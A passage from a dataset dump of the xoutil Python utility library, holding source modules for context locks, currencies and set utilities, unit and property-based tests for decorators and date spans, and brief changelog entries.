% other)\n\n def _invalid_value(self, value):\n cls_name = type(self).__name__\n vname = type(value).__name__\n msg = (\n 'Unsupported type for value \"%s\" of type \"%s\" for a \"%s\", '\n \"must be an integer!\"\n )\n return TypeError(msg % (value, vname, cls_name))\n\n @classmethod\n def _prime_numbers_until(cls, limit):\n \"\"\"This is totally a funny test method.\"\"\"\n res = cls[2:limit]\n for i in range(2, limit // 2 + 1):\n if i in res:\n aux = i + i\n while aux < limit:\n if aux in res:\n res.remove(aux)\n aux += i\n return res\n\n\nMutableSet.register(BitPascalSet)\n\n\n# Smart Tools\n\n\ndef pair(arg):\n \"\"\"Check if `arg` is a pair (two elements tuple or list).\"\"\"\n return arg if isinstance(arg, (tuple, list)) and len(arg) == 2 else None\n\n\ndef smart_iter_items(*args, **kwds):\n \"\"\"Unify iteration over (key, value) pairs.\n\n If a pair of pairs is found, e.g. ``[(1, 2), (3, 4)]``, instead of\n yielding one pair (the outermost), inner two pairs takes precedence.\n\n \"\"\"\n for arg in args:\n if isinstance(arg, Mapping):\n for key in arg:\n yield key, arg[key]\n elif hasattr(arg, \"keys\") and hasattr(arg, \"__getitem__\"):\n # Custom mappings\n for key in arg.keys():\n yield key, arg[key]\n elif pair(arg) and not (pair(arg[0]) and pair(arg[1])):\n yield arg\n else:\n for item in arg:\n if pair(item):\n yield item\n else:\n msg = \"'{}' object '{}' is not a pair\"\n raise TypeError(msg.format(type(item).__name__, item))\n for key in kwds:\n yield key, kwds[key]\n\n\n# get rid of unused global variables\ndel deprecated, recursive_repr\n" }, { "alpha_fraction": 0.7307692170143127, "alphanum_fraction": 0.7307692170143127, "avg_line_length": 77, "blob_id": "70d75db1b23b1aa6f7cfea731dc4d04d5442c486", "content_id": "780c16f7e2d90c36d495b59fd913d2b3d7529fd5", "detected_licenses": [ "Python-2.0", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 78, 
"license_type": "permissive", "max_line_length": 77, "num_lines": 1, "path": "/docs/source/history/_changes-1.6.4.rst", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "- Fix bug in `xoutil.fs.concatfiles`:func:\\ : There were leaked opened files.\n" }, { "alpha_fraction": 0.75, "alphanum_fraction": 0.75, "avg_line_length": 44.14285659790039, "blob_id": "63f00f41c53fa55ba97d217491f099f520b30a14", "content_id": "d74cee1374c0525fcefee23ebf23d78fce605d12", "detected_licenses": [ "Python-2.0", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 316, "license_type": "permissive", "max_line_length": 74, "num_lines": 7, "path": "/docs/source/history/_changes-1.6.7.rst", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "- Added the `strict` argument to `xoutil.records.datetime_reader`:func:.\n\n- You may now install ``xoutil[extra]`` so that not required but useful\n packages are installed when xoutil is installed.\n\n For now this only includes ``python-dateutil`` that allows the change in\n `~xoutil.records.datetime_reader`:func:.\n" }, { "alpha_fraction": 0.5378372669219971, "alphanum_fraction": 0.5474885106086731, "avg_line_length": 25.660818099975586, "blob_id": "7ba58241ede495046bb3f57effd2457ceadd44ae", "content_id": "0c19f71eb391fc4d046da195ad1e7497c2778dd3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4560, "license_type": "no_license", "max_line_length": 78, "num_lines": 171, "path": "/tests/test_decorators.py", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# ---------------------------------------------------------------------\n# Copyright (c) Merchise Autrement [~º/~] and Contributors\n# All rights reserved.\n#\n# This is free software; you can do what the LICENCE file allows you 
to.\n#\n\nimport unittest\nfrom xoutil.decorator import assignment_operator\nfrom xoutil.decorator.meta import decorator\n\n\nclass TestAssignable(unittest.TestCase):\n def test_inline_expression(self):\n @assignment_operator()\n def test(name, *args):\n return name * (len(args) + 1)\n\n self.assertEqual(\"aaa\", test(\"a\", 1, 2))\n\n def test_assignment(self):\n @assignment_operator()\n def test(name, *args):\n return name * (len(args) + 1)\n\n b = test(1, 2, 4)\n self.assertEqual(\"bbbb\", b)\n\n def test_regression_inline(self):\n @assignment_operator(maybe_inline=True)\n def test(name, *args):\n if name:\n return name * (len(args) + 1)\n else:\n return None\n\n self.assertIs(None, test(\"a\", 1, 2))\n\n def test_regression_on_block(self):\n @assignment_operator(maybe_inline=True)\n def union(name, *args):\n return (name,) + args\n\n for which in (union(1, 2),):\n self.assertEqual((None, 1, 2), which)\n\n def test_argsless_decorator(self):\n @decorator\n def log(func, fmt=\"Calling function %s\"):\n def inner(*args, **kwargs):\n print(fmt % func.__name__)\n return func(*args, **kwargs)\n\n return inner\n\n @log\n def hello(msg=\"Hi\"):\n print(msg)\n\n @log()\n def hi(msg=\"Hello\"):\n print(msg)\n\n hi()\n hello()\n pass\n\n def test_returning_argless(self):\n @decorator\n def plus2(func, value=1):\n def inner(*args):\n return func(*args) + value\n\n return inner\n\n @plus2\n def ident2(val):\n return val\n\n @plus2()\n def ident3(val):\n return val\n\n self.assertEqual(ident2(10), 11)\n self.assertEqual(ident3(10), 11)\n\n\nclass RegressionTests(unittest.TestCase):\n def test_with_kwargs(self):\n \"\"\"When passing a function as first positional argument, kwargs should\n be tested empty.\n\n \"\"\"\n from xoutil.future.functools import partial\n\n @decorator\n def ditmoi(target, *args, **kwargs):\n return partial(target, *args, **kwargs)\n\n def badguy(n):\n return n\n\n @ditmoi(badguy, b=1)\n def foobar(n, *args, **kw):\n return n\n\n 
self.assertEqual(badguy, foobar(1))\n\n\nclass Memoizations(unittest.TestCase):\n def test_memoized_property(self):\n from xoutil.future.inspect import getattr_static\n from xoutil.objects import memoized_property\n\n class Foobar:\n @memoized_property\n def prop(self):\n return self\n\n with self.assertRaises(AttributeError):\n\n @prop.setter\n def prop(self, value):\n pass\n\n with self.assertRaises(AttributeError):\n\n @prop.deleter\n def prop(self, value):\n pass\n\n foo = Foobar()\n self.assertNotEquals(getattr_static(foo, \"prop\"), foo)\n self.assertIs(foo.prop, foo)\n self.assertIs(getattr_static(foo, \"prop\"), foo)\n # After the first invocation, the static attr is the result.\n Foobar.prop.reset(foo)\n self.assertNotEquals(getattr_static(foo, \"prop\"), foo)\n\n\nclass ConstantBags(unittest.TestCase):\n def test_constant_bags_decorator(self):\n from xoutil.decorator import constant_bagger as typify\n\n def func(**kwds):\n return kwds\n\n bag = func(ONE=1, TWO=2)\n\n @typify(ONE=1, TWO=2)\n def BAG(**kwds):\n return kwds\n\n self.assertIs(type(BAG), type)\n self.assertIn(\"ONE\", bag)\n self.assertEqual(bag[\"ONE\"], BAG.ONE)\n self.assertEqual(BAG.TWO, 2 * BAG.ONE)\n with self.assertRaises(AttributeError):\n self.assertEqual(bag.TWO, 2 * bag.ONE)\n with self.assertRaises(TypeError):\n self.assertEqual(BAG[\"TWO\"], 2 * BAG[\"ONE\"])\n with self.assertRaises(AttributeError):\n self.assertEqual(BAG.THREE, 3)\n self.assertIs(BAG(THREE=3), BAG)\n self.assertEqual(BAG.THREE, 3)\n\n\nif __name__ == \"__main__\":\n unittest.main(verbosity=2)\n" }, { "alpha_fraction": 0.6420729160308838, "alphanum_fraction": 0.6425120830535889, "avg_line_length": 26.10714340209961, "blob_id": "0b7c304463b87d335d404ca63bde5aef15ab9b06", "content_id": "34a14d4e44146334dea60a1e756c86886816516a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2278, "license_type": "no_license", "max_line_length": 78, "num_lines": 84, "path": 
"/xotl/tools/tasking/lock.py", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# ---------------------------------------------------------------------\n# Copyright (c) Merchise Autrement [~º/~] and Contributors\n# All rights reserved.\n#\n# This is free software; you can do what the LICENCE file allows you to.\n#\n\n\"\"\"Synchronization lock tools.\n\nA lock object is a synchronization primitive. Locks are used as Python\nContext Managers with only one method (`enter`) and one property (`locked`).\n\nThe method `enter` is used with the Python ``with`` statement and the property\n`locked` is logically True or False depending if the lock is active or not.\n\nFor example::\n\n >>> from xotl.tools.lock import context_lock as ctx\n\n >>> def get_lock_value():\n ... return 'Yes' if ctx.locked else 'No'\n\n >>> with ctx.enter():\n ... one = get_lock_value()\n >>> two = get_lock_value()\n >>> (one, two)\n ('Yes', 'No')\n\n\nLocks are implemented using module-property; this means that each time you\nimport it, a different lock is returned::\n\n >>> from xotl.tools.tasking.lock import context_lock as one\n >>> from xotl.tools.tasking.lock import context_lock as two\n >>> one is two\n False\n\nThe function `context_lock`:func: implement a module property to create a\nclass that use an execution context, see `xotl.tools.context`:mod: module for\nmore information.\n\nIf other lock mechanisms are going to be implementing, for example using\nthreading, this is the place.\n\n\"\"\"\n\nfrom xotl.tools.modules import moduleproperty\n\n\n@moduleproperty\ndef context_lock(self):\n \"\"\"Allocate a lock based on xoutil execution contexts.\"\"\"\n from xotl.tools.objects import classproperty\n\n class ContextLock:\n \"\"\"A class representing the lock.\n\n See `xotl.tools.lock`:mod: module for more information.\n\n \"\"\"\n\n def __new__(cls, *args, **kwargs):\n msg = '\"{}\" could not be 
instanced.'.format(cls.__name__)\n raise RuntimeError(msg)\n\n @classmethod\n def enter(cls, **kwargs):\n \"\"\"Enter the context.\"\"\"\n from xotl.tools.context import context\n\n return context(cls, **kwargs)\n\n @classproperty\n def locked(cls):\n from xotl.tools.context import context\n\n return context[cls]\n\n return ContextLock\n\n\ndel moduleproperty\n" }, { "alpha_fraction": 0.5943081974983215, "alphanum_fraction": 0.6085376739501953, "avg_line_length": 23.83458709716797, "blob_id": "59a5fc42488a4435a1d62600d971bc0a6d21bd23", "content_id": "c3bf1aac33c0899199225d54797d7c5ae5dca30b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3304, "license_type": "no_license", "max_line_length": 79, "num_lines": 133, "path": "/xotl/tools/dim/currencies.py", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# ---------------------------------------------------------------------\n# Copyright (c) Merchise Autrement [~º/~] and Contributors\n# All rights reserved.\n#\n# This is free software; you can do what the LICENCE file allows you to.\n#\n\n\"\"\"Concrete numbers for money.\n\nYou may have 10 dollars and 5 euros in your wallet, that does not mean that\nyou have 15 of anything (but bills, perhaps). Though you may *evaluate* your\ncash in any other currency you don't have that value until you perform an\nexchange with a given rate.\n\nThis module support the family of currencies. 
Usage::\n\n >>> from xotl.tools.dim.currencies import Rate, Valuation, currency\n >>> dollar = USD = currency('USD')\n >>> euro = EUR = currency('EUR')\n >>> rate = 1.19196 * USD/EUR\n\n >>> isinstance(dollar, Valuation)\n True\n\n >>> isinstance(rate, Rate)\n True\n\n # Even 0 dollars are a valuation\n >>> isinstance(dollar - dollar, Valuation)\n True\n\n # But 1 is not a value nor a rate\n >>> isinstance(dollar/dollar, Valuation) or isinstance(dollar/dollar, Rate)\n False\n\n\nCurrency names are case-insensitive. We don't check the currency name is\nlisted in `ISO 4217`_. So currency ``MVA`` is totally acceptable in this\nmodule.\n\nWe don't download rates from any source.\n\nThis module allows you to trust your computations of money by allowing only\nsensible operations::\n\n >>> dollar + euro # doctest: +ELLIPSIS\n Traceback (...)\n ...\n OperandTypeError: unsupported operand type(s) for +: '{USD}/{}' and '{EUR}/{}\n\n\nIf you convert your euros to dollars::\n\n >>> dollar + rate * euro\n 2.19196::{USD}/{}\n\n # Or your dollars to euros\n >>> dollar/rate + euro\n 1.83895432733::{EUR}/{}\n\n\n.. 
_ISO 4217: https://en.wikipedia.org/wiki/ISO_4217\n\n\"\"\"\n\n\nclass ValueType(type):\n def __instancecheck__(self, which):\n from .meta import Quantity\n\n if isinstance(which, Quantity):\n return any(\n which.signature is currency.signature\n for currency in _Currency.units.values()\n )\n else:\n return False\n\n\nclass Valuation(metaclass=ValueType):\n pass\n\n\nclass RateType(type):\n def __instancecheck__(self, which):\n from .meta import Quantity\n\n if isinstance(which, Quantity):\n top, bottom = which.signature.top, which.signature.bottom\n if len(top) == len(bottom) == 1:\n iscurrency = lambda s: isinstance(s[0], _Currency)\n return iscurrency(top) and iscurrency(bottom)\n else:\n return False\n else:\n return False\n\n\nclass Rate(metaclass=RateType):\n pass\n\n\nclass _Currency:\n instances = {}\n units = {}\n\n def __new__(cls, name):\n from .meta import Quantity, Signature\n\n name = name.upper()\n res = cls.instances.get(name, None)\n if res is None:\n res = super().__new__(cls)\n res.name = name\n cls.instances[name] = res\n cls.units[name] = Quantity(1, Signature(top=(res,)))\n return res\n\n def __str__(self):\n return self.name\n\n @property\n def unit(self):\n return self.units[self.name]\n\n\ndef currency(name):\n \"\"\"Get the canonical value for the given currency `name`.\n\n \"\"\"\n return _Currency(name).unit\n" }, { "alpha_fraction": 0.7253731489181519, "alphanum_fraction": 0.737313449382782, "avg_line_length": 46.85714340209961, "blob_id": "8b73f319adaf6971263621f5f570cb64207bf0f7", "content_id": "aab7abe9119be6c59268db18d30a0e2a7c3794e3", "detected_licenses": [ "Python-2.0", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 1005, "license_type": "permissive", "max_line_length": 78, "num_lines": 21, "path": "/docs/source/history/_changes-1.5.4.rst", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "- Fix a bug in 
`xoutil.objects.extract_attrs`:func:. It was not raising\n exceptions when some attribute was not found and `default` was not provided.\n\n Also now the function supports paths like\n `xoutil.objects.get_traverser`:func:.\n\n- `xoutil` contains now a copy of the excellent project `six`_ exported as\n ``xoutil.six`` (not documented here). Thus the compatibility module\n ``xoutil.compat`` is now deprecated and will removed in the future.\n\n There are some things that ``xoutil.compat`` has that ``xoutil.six`` does\n not. For instance, ``six`` does not include fine grained python version\n markers. So if your code depends not on Python 3 v Python 2 dichotomy but\n on features introduced in Python 3.2 you must use the ``sys.version_info``\n directly.\n\n Notwithstanding that, ``xoutil`` will slowly backport several Python 3.3\n standard library features to Python 2.7 so that they are consistently used\n in any Python up to 2.7 (but 3.0).\n\n.. _six: https://pypi.python.org/pypi/six\n" }, { "alpha_fraction": 0.6295551061630249, "alphanum_fraction": 0.6574581861495972, "avg_line_length": 28.644033432006836, "blob_id": "ef1c3885a1efdcf81cd71ec43a7b9d7033cb1fbc", "content_id": "a74579e3860833a5835c3298cbbead009f5b21ea", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 14408, "license_type": "no_license", "max_line_length": 88, "num_lines": 486, "path": "/tests/test_datetime.py", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# ---------------------------------------------------------------------\n# Copyright (c) Merchise Autrement [~º/~] and Contributors\n# All rights reserved.\n#\n# This is free software; you can do what the LICENCE file allows you to.\n#\n\nimport pytest\n\nfrom xoutil.future.datetime import date, datetime, timedelta\nfrom xoutil.future.datetime import daterange\nfrom xoutil.future.datetime import TimeSpan, EmptyTimeSpan, 
DateTimeSpan\nfrom xoutil.testing.datetime import timespans, datetimespans\n\nimport hypothesis\nfrom hypothesis import strategies, given, settings\n\n\ndates = strategies.dates\nmaybe_date = dates() | strategies.none()\nmaybe_datetimes = strategies.datetimes() | strategies.none()\n\n\ndef test_datetime_imports():\n from xoutil.future import datetime\n from xotl.tools.future import datetime as dt\n\n assert datetime is dt\n\n from xoutil.future.datetime import TimeSpan\n from xotl.tools.future.datetime import TimeSpan as TS\n\n assert TS is TimeSpan\n\n\ndef test_daterange_stop_only():\n result = list(daterange(date(1978, 10, 21)))\n assert result[0] == date(1978, 10, 1)\n assert result[-1] == date(1978, 10, 20)\n\n\ndef test_daterange_empty():\n assert [] == list(daterange(date(1978, 10, 21), -2))\n assert [] == list(daterange(date(1978, 10, 21), date(1978, 10, 10)))\n assert [] == list(daterange(date(1978, 10, 10), date(1978, 10, 20), -1))\n\n\ndef test_daterange_going_back_in_time():\n result = list(daterange(date(1978, 10, 21), -2, -1))\n assert result[0] == date(1978, 10, 21)\n assert result[-1] == date(1978, 10, 20)\n\n\ndef test_daterange_invalid_int_stop():\n with pytest.raises(TypeError):\n daterange(10)\n\n\ndef test_daterange_invalid_step():\n with pytest.raises(ValueError):\n daterange(None, date(1978, 10, 21), 0)\n\n\n@given(timespans(), timespans())\[email protected](ts1=TimeSpan(), ts2=timespans().example())\ndef test_intersection_commutable(ts1, ts2):\n # Commutable\n assert ts2 * ts1 == (ts1 & ts2)\n\n\n@given(timespans(), timespans())\[email protected](ts1=TimeSpan(), ts2=timespans().example())\ndef test_intersection_containment(ts1, ts2):\n overlap = ts1 * ts2\n if overlap is not None:\n # The intersection must always be totally covered by both ts1 and ts2,\n # unless ts1 and ts2 don't intersect\n assert (overlap & ts1) == overlap\n assert (overlap <= ts1) is True\n assert (overlap <= ts2) is True\n\n\n@given(timespans(), timespans())\[email 
protected](ts1=TimeSpan(), ts2=timespans().example())\ndef test_comparision(ts1, ts2):\n if ts1 <= ts2 <= ts1:\n assert ts1 == ts2\n if ts1 == ts2:\n assert ts1 <= ts2 <= ts1\n\n # Single day intersection and equality test\n if ts1.start_date:\n assert ts1 * ts1.start_date == ts1.start_date\n assert ts1.start_date * ts1 == ts1.start_date\n assert ts1.start_date in ts1\n\n\n@given(timespans(), datetimespans())\ndef test_interaction_timespan_with_datetimespans(ts, dts):\n assert isinstance(dts & ts, (DateTimeSpan, type(EmptyTimeSpan)))\n assert isinstance(ts & dts, (DateTimeSpan, type(EmptyTimeSpan)))\n\n assert DateTimeSpan.from_timespan(ts) == ts\n assert ts == DateTimeSpan.from_timespan(ts)\n\n ts = TimeSpan(\"2018-01-01\", \"2018-01-01\")\n dts = DateTimeSpan(\"2018-01-01 00:00:01\", \"2018-01-01 00:00:02\")\n\n assert ts != dts\n assert dts != ts\n\n\n@given(timespans(), timespans(), dates())\ndef test_general_cmp_properties(ts1, ts2, date):\n assert bool(ts1 <= ts2) == bool(ts2 >= ts1)\n # In Python 2, dates have a __le__ that does no compare to timespans.\n assert bool(TimeSpan.from_date(date) <= ts2) == bool(ts2 >= date)\n\n overlap = ts1 & ts2\n if not overlap:\n # Disjoint sets are not orderable...\n assert not (ts1 <= ts2) and not (ts2 <= ts1)\n\n\n@given(timespans(unbounds=\"future\"))\ndef test_outside_date(ts):\n from datetime import timedelta\n\n assert ts.start_date\n outsider = ts.start_date - timedelta(1)\n assert outsider not in ts\n\n\n@given(\n datetimespans(\n dates=strategies.datetimes(min_value=datetime(1, 1, 2)), unbounds=\"future\"\n )\n)\ndef test_outside_datetime(dts):\n from datetime import timedelta\n\n assert dts.start_date\n outsider = dts.start_date - timedelta(1)\n assert outsider not in dts\n\n\n@given(timespans() | datetimespans())\ndef test_empty_timespan(ts):\n assert ts >= EmptyTimeSpan <= ts, \"Empty is a subset of any TS\"\n\n assert (\n EmptyTimeSpan <= EmptyTimeSpan >= EmptyTimeSpan\n ), \"Empty is a subset of itself\"\n\n 
assert not EmptyTimeSpan, \"Empty is considered False\"\n\n assert not (ts <= EmptyTimeSpan), \"Empty is not a superset of any TS\"\n\n type(EmptyTimeSpan)() is EmptyTimeSpan\n\n assert EmptyTimeSpan & ts == EmptyTimeSpan * ts == EmptyTimeSpan\n assert EmptyTimeSpan | ts == EmptyTimeSpan + ts == ts\n\n\n@given(timespans(unbounds=\"none\"), timespans())\ndef test_failure_of_triple_intersection(ts1, ts2):\n from datetime import timedelta\n\n ts0 = TimeSpan.from_date(ts1.start_date - timedelta(1))\n assert not (ts0 & ts1 & ts2)\n\n\n@given(strategies.dates())\ndef test_xoutil_dates_are_representable(value):\n from xoutil.future.datetime import date\n\n class mydate(date):\n pass\n\n value = mydate(value.year, value.month, value.day)\n assert value.strftime(\"%Y-%m-%d\")\n\n\n@given(timespans(unbounds=\"none\"))\ndef test_timespans_are_representable(value):\n assert repr(value)\n\n\n@given(timespans(unbounds=\"none\"))\ndef test_generate_valid_timespans(ts):\n assert ts.valid\n\n\n@given(timespans(unbounds=\"none\"))\ndef test_ts_returns_dates_not_subtypes(ts):\n from datetime import date\n\n assert type(ts.start_date) is date\n assert type(ts.end_date) is date\n\n\n@given(timespans(unbounds=\"none\"), strategies.dates())\ndef test_operate_with_timespans(ts, d):\n assert ts.start_date - d is not None\n assert d - ts.start_date is not None\n\n\n@given(timespans(unbounds=\"none\"), timespans(unbounds=\"none\"))\ndef test_definition_of_overlaps(ts1, ts2):\n assert ts1.overlaps(ts2) == bool(ts1 & ts2)\n\n\n@given(timespans(unbounds=\"none\"))\ndef test_duplication_of_timespans(ts1):\n ts2 = TimeSpan(ts1.start_date, ts1.end_date)\n assert {ts1, ts2} == {ts1}, \"ts1 and ts2 are equal but different!\"\n\n\n@given(timespans(), strategies.integers(min_value=-1000, max_value=1000))\ndef test_timespans_displacement_reversed(ts1, delta):\n try:\n assert (ts1 << delta) == (ts1 >> -delta)\n except OverflowError:\n pass\n\n\n@given(timespans(), strategies.integers(min_value=-1000, 
max_value=1000))\ndef test_timespans_displacement_keeps_unbounds(ts1, delta):\n try:\n assert ts1.unbound == (ts1 << delta).unbound\n assert ts1.future_unbound == (ts1 << delta).future_unbound\n assert ts1.past_unbound == (ts1 << delta).past_unbound\n except OverflowError:\n pass\n\n\n@given(timespans(), strategies.integers(min_value=-1000, max_value=1000))\ndef test_timespans_displacement_doubled(ts1, delta):\n try:\n assert ((ts1 << delta) << delta) == (ts1 << (2 * delta))\n except OverflowError:\n pass\n\n\n@given(timespans(), strategies.integers(min_value=-1000, max_value=1000))\ndef test_timespans_displacement_backandforth(ts1, delta):\n try:\n assert ts1 == ((ts1 << delta) >> delta) == (ts1 << 0) == (ts1 >> 0)\n except OverflowError:\n pass\n\n\n@given(timespans(unbounds=\"none\"), strategies.integers(min_value=-1000, max_value=1000))\ndef test_timespans_displacement_dates(ts1, delta):\n try:\n res = ts1 << delta\n except OverflowError:\n # Ignore if the date it's being displaced to non-supported date,\n # that's for the client to deal with\n pass\n else:\n assert (res.start_date - ts1.start_date).days == -delta\n assert (res.end_date - ts1.end_date).days == -delta\n try:\n res = ts1 >> delta\n except OverflowError:\n # Ignore if the date it's being displaced to non-supported date,\n # that's for the client to deal with\n pass\n else:\n assert (res.start_date - ts1.start_date).days == delta\n assert (res.end_date - ts1.end_date).days == delta\n\n\n@given(\n timespans(unbounds=\"none\") | datetimespans(unbounds=\"none\"),\n strategies.integers(min_value=-1000, max_value=1000),\n)\ndef test_timespans_displacement_keeps_the_len(ts1, delta):\n try:\n res = ts1 << delta\n except OverflowError:\n pass\n else:\n assert len(ts1) == len(res)\n\n\n@given(timespans() | datetimespans())\ndef test_timespans_are_pickable(ts):\n import pickle\n\n for proto in range(1, pickle.HIGHEST_PROTOCOL + 1):\n assert ts == pickle.loads(pickle.dumps(ts, proto))\n\n\ndef 
test_empty_timespan_is_pickable():\n import pickle\n\n for proto in range(1, pickle.HIGHEST_PROTOCOL + 1):\n assert EmptyTimeSpan is pickle.loads(pickle.dumps(EmptyTimeSpan, proto))\n\n\n@given(strategies.datetimes(), strategies.datetimes())\ndef test_timespan_with_datetimes(d1, d2):\n from datetime import datetime as dt, date as d\n\n ts = TimeSpan(d1, d2)\n assert not isinstance(ts.start_date, dt)\n assert isinstance(ts.start_date, d)\n assert not isinstance(ts.end_date, dt)\n assert isinstance(ts.end_date, d)\n\n\n@given(datetimespans())\ndef test_datetimespans_ts_fields(dts):\n if dts.start_datetime is None:\n assert dts.start_date is None\n else:\n assert dts.start_date == dts.start_datetime.date()\n if dts.end_datetime is None:\n assert dts.end_date is None\n else:\n assert dts.end_date == dts.end_datetime.date()\n\n\n@given(maybe_date, datetimespans())\ndef test_setting_start_date(d, dts):\n dts.start_date = d\n if d is not None:\n assert dts.start_datetime.date() == d\n assert dts.start_datetime == datetime(d.year, d.month, d.day)\n else:\n assert dts.start_datetime is None\n\n\n@given(maybe_date, datetimespans())\ndef test_setting_end_date(d, dts):\n dts.end_date = d\n if d is not None:\n assert dts.end_datetime.date() == d\n assert dts.end_datetime == datetime(d.year, d.month, d.day, 23, 59, 59)\n else:\n assert dts.end_datetime is None\n\n\n@given(\n strategies.datetimes(\n min_value=datetime(1970, 1, 1), max_value=datetime(5000, 12, 31)\n ),\n strategies.integers(min_value=1, max_value=200),\n)\ndef test_timespan_diff(start_date, delta):\n days = timedelta(days=delta)\n big = TimeSpan(start_date, start_date + 3 * days)\n x, y = big.diff(big)\n assert x is EmptyTimeSpan and y is EmptyTimeSpan\n\n x, y = big.diff(EmptyTimeSpan)\n assert x == big and y is EmptyTimeSpan\n\n outsider = big >> 4 * days\n assert not big & outsider\n x, y = big.diff(outsider)\n assert x == big and y is EmptyTimeSpan\n x, y = outsider.diff(big)\n assert x == outsider and y is 
EmptyTimeSpan\n\n atstart = TimeSpan(start_date, start_date + days)\n assert atstart < big\n x, y = big.diff(atstart)\n assert x is EmptyTimeSpan\n assert y\n assert add_timespans(atstart, y) == big\n\n beforestart = TimeSpan(start_date - days, start_date + days)\n x, y = big.diff(beforestart)\n assert x is EmptyTimeSpan\n assert y\n assert add_timespans(beforestart & big, y) == big\n\n atend = TimeSpan(start_date + 2 * days, start_date + 3 * days)\n assert atend < big\n x, y = big.diff(atend)\n assert y is EmptyTimeSpan\n assert x\n assert add_timespans(x, atend) == big\n\n afterend = TimeSpan(start_date + 2 * days, start_date + 4 * days)\n x, y = big.diff(afterend)\n assert y is EmptyTimeSpan\n assert x\n assert add_timespans(x, big & afterend) == big\n\n middle = TimeSpan(start_date + days, start_date + 2 * days)\n assert middle < big\n x, y = big.diff(middle)\n assert x and y\n assert add_timespans(add_timespans(x, middle), y) == big\n\n bigger = TimeSpan(start_date - days, start_date + 4 * days)\n x, y = big.diff(bigger)\n assert x is EmptyTimeSpan and y is EmptyTimeSpan\n\n\n@given(\n strategies.datetimes(\n min_value=datetime(1970, 1, 1), max_value=datetime(5000, 12, 31)\n ),\n strategies.integers(min_value=1, max_value=10000),\n)\n@settings(deadline=None)\ndef test_datetimespan_diff(start_date, delta):\n secs = timedelta(seconds=delta)\n big = DateTimeSpan(start_date, start_date + 3 * secs)\n assert big.start_datetime == start_date\n assert big.end_datetime == start_date + 3 * secs\n x, y = big.diff(big)\n assert x is EmptyTimeSpan and y is EmptyTimeSpan\n\n x, y = big.diff(EmptyTimeSpan)\n assert x == big and y is EmptyTimeSpan\n\n outsider = big >> 4 * secs\n assert not big & outsider\n x, y = big.diff(outsider)\n assert x == big and y is EmptyTimeSpan\n x, y = outsider.diff(big)\n assert x == outsider and y is EmptyTimeSpan\n\n atstart = DateTimeSpan(start_date, start_date + secs)\n assert atstart < big\n x, y = big.diff(atstart)\n assert x is 
EmptyTimeSpan\n assert y\n assert add_dtspans(atstart, y) == big\n\n beforestart = DateTimeSpan(start_date - secs, start_date + secs)\n x, y = big.diff(beforestart)\n assert x is EmptyTimeSpan\n assert y\n assert add_dtspans(beforestart & big, y) == big\n\n atend = DateTimeSpan(start_date + 2 * secs, start_date + 3 * secs)\n assert atend < big\n x, y = big.diff(atend)\n assert y is EmptyTimeSpan\n assert x\n assert add_dtspans(x, atend) == big\n\n afterend = DateTimeSpan(start_date + 2 * secs, start_date + 4 * secs)\n x, y = big.diff(afterend)\n assert y is EmptyTimeSpan\n assert x\n assert add_dtspans(x, big & afterend) == big\n\n middle = DateTimeSpan(start_date + secs, start_date + 2 * secs)\n assert middle < big\n x, y = big.diff(middle)\n assert x and y\n assert add_dtspans(add_dtspans(x, middle), y) == big\n\n bigger = DateTimeSpan(start_date - secs, start_date + 4 * secs)\n x, y = big.diff(bigger)\n assert x is EmptyTimeSpan and y is EmptyTimeSpan\n\n\n@given(datetimespans())\ndef test_datetimespan_repr(ts):\n assert eval(repr(ts)) == ts\n assert DateTimeSpan(\"2018-01-01\") == DateTimeSpan(datetime(2018, 1, 1))\n\n\ndef add_timespans(x, y):\n if x.end_date == y.start_date - timedelta(1):\n return TimeSpan(x.start_date, y.end_date)\n else:\n raise ValueError\n\n\ndef add_dtspans(x, y):\n if x.end_datetime == y.start_datetime - timedelta(seconds=1):\n return DateTimeSpan(x.start_datetime, y.end_datetime)\n else:\n raise ValueError\n" }, { "alpha_fraction": 0.7257384061813354, "alphanum_fraction": 0.7257384061813354, "avg_line_length": 32.85714340209961, "blob_id": "a11f071b0a7db48df4ed43ca95eeb522ec3b5c3b", "content_id": "3ecfb64f0ab3cc99d1bb4613503249eb5d8652c9", "detected_licenses": [ "Python-2.0", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 237, "license_type": "permissive", "max_line_length": 78, "num_lines": 7, "path": 
